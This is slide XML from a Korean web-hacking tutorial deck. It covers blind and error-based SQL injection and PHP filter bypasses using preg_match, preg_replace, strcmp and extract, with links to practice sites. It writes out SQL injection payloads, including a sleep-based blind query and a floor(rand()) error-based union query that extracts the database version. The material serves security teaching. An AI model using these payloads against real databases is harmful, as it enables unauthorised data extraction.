              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>사용</a:t>
            </a:r>
            <a:endParaRPr lang="en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89072D4-B358-7F4A-A90C-B16EB58BF8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="3807801"/>
            <a:ext cx="8228013" cy="13207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425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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1' or if((ascii(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substr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((select database()) = 1),sleep(4),1)#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D46509-0FF8-594C-932A-DC0FEC20411B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898171" y="3219936"/>
            <a:ext cx="5306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 Base SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>쿼리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4239148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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="458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 Base SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23854173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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="4051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Error Based SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR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9F750F-9940-B44A-BD62-F75B6B2298EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="635462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KR" dirty="0"/>
              <a:t>쿼리 사용이 가능하고 에러문을 그대로 출력할 경우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>사용</a:t>
            </a:r>
            <a:endParaRPr lang="en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89072D4-B358-7F4A-A90C-B16EB58BF8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="3807801"/>
            <a:ext cx="8228013" cy="13207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425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>1’ union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>select sum(1),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>(version(),floor(rand(0)*2)) as A from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t> group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>A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D46509-0FF8-594C-932A-DC0FEC20411B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898171" y="3219936"/>
            <a:ext cx="5306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 Base SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>쿼리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36429664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SQL Injection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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="4051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Error Based SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR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9F750F-9940-B44A-BD62-F75B6B2298EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1854726"/>
            <a:ext cx="635462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KR" dirty="0"/>
              <a:t>쿼리 사용이 가능하고 에러문을 그대로 출력할 경우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>사용</a:t>
            </a:r>
            <a:endParaRPr lang="en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89072D4-B358-7F4A-A90C-B16EB58BF8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="3807801"/>
            <a:ext cx="8228013" cy="13207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425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>1’ union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>select sum(1),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>(version(),floor(rand(0)*2)) as A from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t> group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>A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D46509-0FF8-594C-932A-DC0FEC20411B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898171" y="3219936"/>
            <a:ext cx="5306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 Base SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>쿼리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4007304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381316" y="2322415"/>
            <a:ext cx="9429368" cy="1474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Chapter 6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ETC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13174992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ETC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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="1896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preg_match</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1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89072D4-B358-7F4A-A90C-B16EB58BF8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="3807801"/>
            <a:ext cx="9497630" cy="20363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425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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array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1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pP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preg_match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함수는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100k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문자열까지만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비교할 수 있기 때문에 이를 이용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1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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http://203.229.206.22/~wing608/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webstudy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att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/05/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preg_match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D46509-0FF8-594C-932A-DC0FEC20411B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898171" y="3219936"/>
            <a:ext cx="490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preg_match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>우회법</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>및</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C69F6F77-9880-6447-B995-BEBCD7BFF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65" y="1854726"/>
            <a:ext cx="8075488" cy="123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3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381316" y="2322415"/>
            <a:ext cx="9429368" cy="221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Chapter 1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PYTHON SOCKET &amp; BRUTE FORCE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&amp; Directory Listing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34168053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ETC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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="2046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preg_replace</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1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89072D4-B358-7F4A-A90C-B16EB58BF8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882502" y="3807801"/>
            <a:ext cx="10241951" cy="24236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425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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옵션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패턴의 문자는 대문자와 소문자를 구별하지 않음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1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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옵션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s: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문자열을 하나의 긴 라인으로 취급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1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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정규식 부분에서 옵션을 줄 때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옵션을 주게 되면 치환하는 문자열을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코드로 인식</a:t>
            </a:r>
            <a:b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*PHP 5.5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가능 했으며 현재 불가</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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http://203.229.206.22/~wing608/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webstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>/05/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>preg_replace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D46509-0FF8-594C-932A-DC0FEC20411B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898171" y="3219936"/>
            <a:ext cx="3911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preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>특징</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>및</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083182A7-88BE-CF41-A6ED-2CCC48E53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71" y="1854686"/>
            <a:ext cx="8228014" cy="136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972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ETC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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="1216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strcmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1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89072D4-B358-7F4A-A90C-B16EB58BF8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="4016865"/>
            <a:ext cx="10241951" cy="22373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425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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비교함수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1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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문자열이 같을 때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반환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1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pP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strcmp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문자열과 배열을 비교할 경우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null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반환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1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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http://wargame.kr:8080/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strcmp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D46509-0FF8-594C-932A-DC0FEC20411B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898172" y="3429000"/>
            <a:ext cx="3892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strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>특징</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>및</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9269562-47B3-3C48-8771-FF902D1B8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71" y="1733353"/>
            <a:ext cx="5952744" cy="154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99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ETC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06CDDDA-D6BD-1743-B284-669D5C3C08E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438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extract</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR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8333D0-718A-B640-A2A4-18620BEAF1E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898172" y="3652520"/>
            <a:ext cx="3786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extract </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>특징</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>및</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-KR" sz="2400" b="1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FC4D5FA-0A59-B94A-BF07-FBB8AFBECB1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="4240385"/>
            <a:ext cx="10241951" cy="22373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425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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속의 키 값을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변수화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시켜주는 함수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1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="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Extract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위에 있는 함수의 값 변경 가능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1425"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F0AD00"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>http://203.229.206.22/~wing608/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>webstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>/05/extract/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{845E40F3-966A-4347-BFA7-3D5B2DC18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72" y="1656524"/>
            <a:ext cx="3786615" cy="178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359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13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{780759B6-2BA5-A94B-AEC9-036413BEE5A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2838735" y="2649726"/>
            <a:ext cx="5759864" cy="1349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Q &amp; A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감사합니다</a:t>
            </a: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14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Python Socket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88B6E15-AC6C-D648-90FC-0227DA9A1265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1203438"/>
            <a:ext cx="4034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Python Socket – requests</a:t>
            </a:r>
            <a:endParaRPr lang="en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BC1DDF-154F-3B40-A22C-B7C0A56F9728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="1670060"/>
            <a:ext cx="113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GET 방식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17F072-11CD-9C4C-9033-EA04D1705221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882503" y="3897359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POST 방식</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B62EEC-DF45-864B-9825-A26F6566D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03" y="2103254"/>
            <a:ext cx="5276850" cy="1600200"/>
          </a:xfrm>
